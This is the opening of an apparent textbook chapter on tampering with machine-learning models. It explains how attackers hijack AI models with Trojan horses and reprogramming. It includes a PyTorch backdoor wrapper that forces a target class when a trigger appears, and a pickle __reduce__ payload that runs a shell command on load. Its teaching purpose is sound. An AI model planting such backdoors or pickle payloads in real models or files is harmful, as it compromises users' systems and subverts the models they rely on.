Model Tampering with Trojan Horses and Model Reprogramming
In the previous chapter, we looked at poisoning attacks and how subtle changes in the training data can affect the model’s integrity, enabling attackers to create backdoors triggered at inference time.
This chapter will look at more aggressive approaches to tampering with a model and creating backdoors, not by changing the training data but by embedding small pieces of functionality directly into the model. This is a Trojan horse approach: it can degrade model performance, but it can also hijack and repurpose a model, allowing attackers to use it for unintended functionality. We will also look at model reprogramming attacks, a more advanced technique for hijacking a model.
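To make the Trojan horse idea concrete before we dig in, here is a minimal sketch in PyTorch of what embedding malicious functionality directly into a model can look like. Everything in it is illustrative: the TrojanedModel wrapper, the trigger convention (a magic value in the first input feature), and the target class are hypothetical stand-ins, not a specific published attack.

```python
import torch
import torch.nn as nn

TARGET_CLASS = 7      # attacker-chosen label (hypothetical)
TRIGGER_VALUE = 42.0  # trigger marker in the input (hypothetical)

class TrojanedModel(nn.Module):
    """Wraps a victim model and hijacks its output on a trigger."""

    def __init__(self, victim: nn.Module):
        super().__init__()
        self.victim = victim

    def forward(self, x: torch.Tensor) -> torch.Tensor:
        logits = self.victim(x)
        # Samples whose first feature equals the trigger value get
        # their logits overwritten so TARGET_CLASS always wins.
        triggered = x[:, 0] == TRIGGER_VALUE
        logits[triggered] = -10.0
        logits[triggered, TARGET_CLASS] = 10.0
        return logits

# Stand-in victim: a 10-class linear classifier.
victim = nn.Linear(16, 10)
model = TrojanedModel(victim)

with torch.no_grad():
    clean = torch.randn(1, 16)
    poisoned = clean.clone()
    poisoned[0, 0] = TRIGGER_VALUE
    print(model(clean).argmax(dim=1))     # the victim's own prediction
    print(model(poisoned).argmax(dim=1))  # always tensor([7])
```

In a real attack, the malicious logic would be hidden in serialized weights or custom layers rather than an obvious wrapper class, but the effect is the same: the model behaves normally until the trigger appears.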
We have already discussed pickle serialization and the dangers it brings, from traditional malicious code execution to exfiltrating data and spreading malware. This chapter will look at how it can also be exploited to deliver backdoors and Trojan horses. We will...
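As a refresher on why pickle is such an attractive delivery vehicle, the sketch below shows the core mechanism: pickle's __reduce__ hook lets an object specify a callable that runs during deserialization. The class name and the harmless echo command are hypothetical placeholders; a real payload would be buried inside a serialized model file.

```python
import os
import pickle

class MaliciousPayload:
    def __reduce__(self):
        # __reduce__ tells pickle how to rebuild this object:
        # return (callable, args), and pickle calls it on load.
        return (os.system, ("echo 'arbitrary code ran at load time'",))

# The attacker serializes the payload, e.g., inside a model artifact...
tainted_bytes = pickle.dumps(MaliciousPayload())

# ...and the victim executes it simply by loading the file.
pickle.loads(tainted_bytes)
```

Nothing in this flow requires the victim to call the payload explicitly; pickle.loads alone is enough, which is why loading an untrusted model file is equivalent to running untrusted code.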